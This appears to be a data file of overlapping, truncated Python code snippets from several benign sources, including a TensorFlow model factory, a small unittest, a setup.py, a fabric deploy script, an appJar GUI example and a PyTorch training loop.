"'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs",
"import * from .preact_resnet import * from .densenet import * from .dpn import",
"* from .dla import * from .senet import * def create_model(model_name, initializer, weight_decay):",
".dpn import * from .dla import * from .senet import * def create_model(model_name,",
"from .dla import * from .senet import * def create_model(model_name, initializer, weight_decay): model_dict",
"* from .dpn import * from .dla import * from .senet import *",
"* from .densenet import * from .dpn import * from .dla import *",
"initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d,",
"import tensorflow as tf from .vgg import * from .resnet import * from",
"PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer",
"import * from .densenet import * from .dpn import * from .dla import",
"DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs =",
"SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer':",
"} regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model",
"weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet':",
"import * from .dla import * from .senet import * def create_model(model_name, initializer,",
"'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer =",
"* from .senet import * def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg':",
"= { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model = model_dict[model_name](**kwargs) print(model.summary()) return model",
"{ 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32,",
"'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet':",
"* from .preact_resnet import * from .densenet import * from .dpn import *",
"= tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model = model_dict[model_name](**kwargs)",
"from .preact_resnet import * from .densenet import * from .dpn import * from",
"tf from .vgg import * from .resnet import * from .resnext import *",
"import * from .resnet import * from .resnext import * from .preact_resnet import",
"import * from .resnext import * from .preact_resnet import * from .densenet import",
"* from .resnext import * from .preact_resnet import * from .densenet import *",
".senet import * def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet':",
"as tf from .vgg import * from .resnet import * from .resnext import",
"VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26,",
"'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla':",
"'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, }",
"import * def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56,",
"'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = {",
"DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, }",
"from .vgg import * from .resnet import * from .resnext import * from",
"* def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet':",
".resnext import * from .preact_resnet import * from .densenet import * from .dpn",
"regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model =",
"DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer':",
"kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model = model_dict[model_name](**kwargs) print(model.summary()) return",
".resnet import * from .resnext import * from .preact_resnet import * from .densenet",
"ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA,",
"tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model = model_dict[model_name](**kwargs) print(model.summary())",
"from .densenet import * from .dpn import * from .dla import * from",
"from .resnext import * from .preact_resnet import * from .densenet import * from",
".dla import * from .senet import * def create_model(model_name, initializer, weight_decay): model_dict =",
".vgg import * from .resnet import * from .resnext import * from .preact_resnet",
"def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56,",
"from .resnet import * from .resnext import * from .preact_resnet import * from",
"* from .resnet import * from .resnext import * from .preact_resnet import *",
"model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57,",
"ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay)",
".densenet import * from .dpn import * from .dla import * from .senet",
"from .dpn import * from .dla import * from .senet import * def"
] |
[
"True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self):",
"sys sys.dont_write_bytecode = True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3),",
"import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3),",
"def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if __name__ == '__main__': unittest.main()",
"inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if __name__",
"= True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def",
"class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if __name__ ==",
"import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if",
"sys.dont_write_bytecode = True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4)",
"import sys sys.dont_write_bytecode = True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self):",
"Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if __name__ == '__main__':",
"unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2)",
"<gh_stars>0 import sys sys.dont_write_bytecode = True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def"
] |
[
"here not reacheable since following 'if' -> 'else'.\") print(\"Just finished all the 'y'",
"x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\") if y ==",
"end of y:{y} loop.\" ) # print(\"Will this start at beginning of 'y'",
"# Second edit. # Added feature_01. # Create two nested 'for' loops. for",
"finished all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished all",
"edit. # Added feature_01. # Create two nested 'for' loops. for x in",
"'if' -> 'else'. print(\"Code here not reacheable since following 'if' -> 'else'.\") print(\"Just",
"loop.\") if y == 3: print(x, y, 'breaking') # print(\"Only 'break' out of",
"-> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\")",
"y in range(1,5): print(f\"Start of y:{y} loop.\") if y == 3: print(x, y,",
"the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished all the 'x'",
"range(1,5): print(f\"Start of y:{y} loop.\") if y == 3: print(x, y, 'breaking') #",
"'for' loops. for x in range(1,5): print(f\"Start of x:{x} loop.\") for y in",
"'break' out of inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA end",
"# Added feature_01. # Create two nested 'for' loops. for x in range(1,5):",
"reacheable since following 'if' -> 'else'. print(\"Code here not reacheable since following 'if'",
"loops. for x in range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5):",
"of inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA end of y:{y}",
"# print(\"Will this start at beginning of 'y' loop?\") continue # Code here",
"'else'. print(\"Code here not reacheable since following 'if' -> 'else'.\") print(\"Just finished all",
"print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished",
"# Code here not reacheable since following 'if' -> 'else'. print(\"Code here not",
"two nested 'for' loops. for x in range(1,5): print(f\"Start of x:{x} loop.\") for",
"following 'if' -> 'else'. print(\"Code here not reacheable since following 'if' -> 'else'.\")",
"print(\"Will this start at beginning of 'y' loop?\") continue # Code here not",
"feature_01. # Create two nested 'for' loops. for x in range(1,5): print(f\"Start of",
"x in range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start of",
"Create two nested 'for' loops. for x in range(1,5): print(f\"Start of x:{x} loop.\")",
"range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\")",
"not reacheable since following 'if' -> 'else'. print(\"Code here not reacheable since following",
"loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\") if y == 3:",
"this start at beginning of 'y' loop?\") continue # Code here not reacheable",
"here not reacheable since following 'if' -> 'else'. print(\"Code here not reacheable since",
"of y:{y} loop.\") if y == 3: print(x, y, 'breaking') # print(\"Only 'break'",
") # print(\"Will this start at beginning of 'y' loop?\") continue # Code",
"not reacheable since following 'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\")",
"since following 'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just",
"Added feature_01. # Create two nested 'for' loops. for x in range(1,5): print(f\"Start",
"y, f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will this start at",
"in range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y}",
"in range(1,5): print(f\"Start of y:{y} loop.\") if y == 3: print(x, y, 'breaking')",
"print(f\"Start of y:{y} loop.\") if y == 3: print(x, y, 'breaking') # print(\"Only",
"loop.\") break else: print(x, y, f\"continuing. AKA end of y:{y} loop.\" ) #",
"if y == 3: print(x, y, 'breaking') # print(\"Only 'break' out of inner",
"at beginning of 'y' loop?\") continue # Code here not reacheable since following",
"-> 'else'. print(\"Code here not reacheable since following 'if' -> 'else'.\") print(\"Just finished",
"of y:{y} loop.\" ) # print(\"Will this start at beginning of 'y' loop?\")",
"print(x, y, 'breaking') # print(\"Only 'break' out of inner 'y' loop.\") break else:",
"print(\"Code here not reacheable since following 'if' -> 'else'.\") print(\"Just finished all the",
"print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\") if",
"y == 3: print(x, y, 'breaking') # print(\"Only 'break' out of inner 'y'",
"since following 'if' -> 'else'. print(\"Code here not reacheable since following 'if' ->",
"== 3: print(x, y, 'breaking') # print(\"Only 'break' out of inner 'y' loop.\")",
"of 'y' loop?\") continue # Code here not reacheable since following 'if' ->",
"'breaking') # print(\"Only 'break' out of inner 'y' loop.\") break else: print(x, y,",
"following 'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished",
"'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished all the 'x' loops.\")",
"continue # Code here not reacheable since following 'if' -> 'else'. print(\"Code here",
"'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just",
"loop.\" ) # print(\"Will this start at beginning of 'y' loop?\") continue #",
"print(\"Only 'break' out of inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA",
"# Create two nested 'for' loops. for x in range(1,5): print(f\"Start of x:{x}",
"y:{y} loop.\" ) # print(\"Will this start at beginning of 'y' loop?\") continue",
"out of inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA end of",
"3: print(x, y, 'breaking') # print(\"Only 'break' out of inner 'y' loop.\") break",
"nested 'for' loops. for x in range(1,5): print(f\"Start of x:{x} loop.\") for y",
"y, 'breaking') # print(\"Only 'break' out of inner 'y' loop.\") break else: print(x,",
"y:{y} loop.\") if y == 3: print(x, y, 'breaking') # print(\"Only 'break' out",
"Code here not reacheable since following 'if' -> 'else'. print(\"Code here not reacheable",
"f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will this start at beginning",
"break else: print(x, y, f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will",
"start at beginning of 'y' loop?\") continue # Code here not reacheable since",
"for x in range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start",
"Second edit. # Added feature_01. # Create two nested 'for' loops. for x",
"loop?\") continue # Code here not reacheable since following 'if' -> 'else'. print(\"Code",
"'y' loop.\") break else: print(x, y, f\"continuing. AKA end of y:{y} loop.\" )",
"reacheable since following 'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also,",
"inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA end of y:{y} loop.\"",
"AKA end of y:{y} loop.\" ) # print(\"Will this start at beginning of",
"beginning of 'y' loop?\") continue # Code here not reacheable since following 'if'",
"else: print(x, y, f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will this",
"# print(\"Only 'break' out of inner 'y' loop.\") break else: print(x, y, f\"continuing.",
"for y in range(1,5): print(f\"Start of y:{y} loop.\") if y == 3: print(x,",
"'y' loop?\") continue # Code here not reacheable since following 'if' -> 'else'.",
"all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished all the",
"of x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\") if y",
"'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished x:{x}",
"print(x, y, f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will this start"
] |
[
"packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT',",
"import setup, find_packages # python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']),",
"<reponame>timniven/hsdbi<gh_stars>0 from setuptools import setup, find_packages # python setup.py sdist upload -r pypi",
"Development :: Libraries :: Python Modules', 'Programming Language :: Python :: 3', 'License",
"Python :: 3', 'License :: OSI Approved :: MIT License', ], keywords='database interface",
"name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz',",
"'Programming Language :: Python :: 3', 'License :: OSI Approved :: MIT License',",
":: 3', 'License :: OSI Approved :: MIT License', ], keywords='database interface facade',",
"3', 'License :: OSI Approved :: MIT License', ], keywords='database interface facade', install_requires=[",
"Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development",
"upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.',",
"Audience :: Developers', 'Topic :: Software Development :: Libraries :: Python Modules', 'Programming",
"'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries :: Python Modules',",
"pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>',",
"setuptools import setup, find_packages # python setup.py sdist upload -r pypi setup( name='hsdbi',",
"Modules', 'Programming Language :: Python :: 3', 'License :: OSI Approved :: MIT",
"Libraries :: Python Modules', 'Programming Language :: Python :: 3', 'License :: OSI",
"author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience",
"interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status ::",
"# python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple",
"sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing",
"setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi',",
"accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 -",
"'Topic :: Software Development :: Libraries :: Python Modules', 'Programming Language :: Python",
":: Software Development :: Libraries :: Python Modules', 'Programming Language :: Python ::",
"databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha',",
":: Python Modules', 'Programming Language :: Python :: 3', 'License :: OSI Approved",
"- Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries ::",
"'License :: OSI Approved :: MIT License', ], keywords='database interface facade', install_requires=[ 'pymongo',",
"download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers',",
"Language :: Python :: 3', 'License :: OSI Approved :: MIT License', ],",
"3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries",
":: Python :: 3', 'License :: OSI Approved :: MIT License', ], keywords='database",
"classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic ::",
"find_packages # python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A",
"version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[",
":: Developers', 'Topic :: Software Development :: Libraries :: Python Modules', 'Programming Language",
":: Libraries :: Python Modules', 'Programming Language :: Python :: 3', 'License ::",
"for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3",
"'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software",
"setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for",
"Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries :: Python",
"simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status",
"setup, find_packages # python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18',",
"python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface",
"Developers', 'Topic :: Software Development :: Libraries :: Python Modules', 'Programming Language ::",
"Software Development :: Libraries :: Python Modules', 'Programming Language :: Python :: 3',",
"url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience ::",
":: OSI Approved :: MIT License', ], keywords='database interface facade', install_requires=[ 'pymongo', 'sqlalchemy'",
"-r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>',",
"Approved :: MIT License', ], keywords='database interface facade', install_requires=[ 'pymongo', 'sqlalchemy' ] )",
"OSI Approved :: MIT License', ], keywords='database interface facade', install_requires=[ 'pymongo', 'sqlalchemy' ]",
"from setuptools import setup, find_packages # python setup.py sdist upload -r pypi setup(",
"author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended",
"Python Modules', 'Programming Language :: Python :: 3', 'License :: OSI Approved ::",
":: 3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development ::",
"description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development",
"license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic"
] |
[
"sudo, local from ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd cp",
"cp.get('install','location') == 'local': run = local cd = lcd def lsudo(op): local('sudo {0}'.format(op))",
"SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def deploy(): #",
"lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL =",
"cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd = lcd def lsudo(op):",
"fabric.operations import run, sudo, local from ConfigParser import ConfigParser import geospatial from fabric.context_managers",
"from ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd cp = ConfigParser()",
"ConfigParser import geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location')",
"local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J =",
"from fabric.decorators import task from fabric.operations import run, sudo, local from ConfigParser import",
"import geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') ==",
"lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J",
"task from fabric.operations import run, sudo, local from ConfigParser import ConfigParser import geospatial",
"= lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def",
"if cp.get('install','location') == 'local': run = local cd = lcd def lsudo(op): local('sudo",
"'local': run = local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo =",
"{0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j')",
"import ConfigParser import geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if",
"= ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd = lcd",
"= lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL",
"cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def deploy(): # geospatial.install_hdf() geospatial.install_netCDF4()",
"run = local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo",
"fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run =",
"import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local",
"def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install')",
"lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def deploy():",
"cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src')",
"run, sudo, local from ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd",
"import run, sudo, local from ConfigParser import ConfigParser import geospatial from fabric.context_managers import",
"cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd =",
"geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local':",
"local from ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd cp =",
"lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd",
"ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd = lcd def",
"== 'local': run = local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo",
"sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True)",
"= cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def deploy(): # geospatial.install_hdf()",
"fabric.decorators import task from fabric.operations import run, sudo, local from ConfigParser import ConfigParser",
"from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run",
"= local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC",
"local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC =",
"ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg')",
"import task from fabric.operations import run, sudo, local from ConfigParser import ConfigParser import",
"from fabric.operations import run, sudo, local from ConfigParser import ConfigParser import geospatial from"
] |
[
"app = gui() # top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to",
"from appJar import gui app = gui() # top slice - CREATE the",
"# add a label app.setLabelBg(\"title\", \"red\") # set the label's background to be",
"CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\")",
"label app.setLabelBg(\"title\", \"red\") # set the label's background to be red app.go() #",
"a label app.setLabelBg(\"title\", \"red\") # set the label's background to be red app.go()",
"the label's background to be red app.go() # bottom slice - START the",
"= gui() # top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\")",
"<filename>examples/simpleApp.py # import the library from appJar import gui app = gui() #",
"the library from appJar import gui app = gui() # top slice -",
"\"red\") # set the label's background to be red app.go() # bottom slice",
"set the label's background to be red app.go() # bottom slice - START",
"the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\") #",
"label's background to be red app.go() # bottom slice - START the GUI",
"- CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\",",
"import the library from appJar import gui app = gui() # top slice",
"library from appJar import gui app = gui() # top slice - CREATE",
"app.setLabelBg(\"title\", \"red\") # set the label's background to be red app.go() # bottom",
"to appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set the label's background",
"top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a",
"# set the label's background to be red app.go() # bottom slice -",
"slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label",
"GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set",
"add a label app.setLabelBg(\"title\", \"red\") # set the label's background to be red",
"# import the library from appJar import gui app = gui() # top",
"app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set the",
"import gui app = gui() # top slice - CREATE the GUI app.addLabel(\"title\",",
"appJar import gui app = gui() # top slice - CREATE the GUI",
"# top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add",
"gui app = gui() # top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome",
"gui() # top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") #",
"\"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set the label's",
"appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set the label's background to"
] |
[] |
[
"parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training",
"np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1,",
"roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3',",
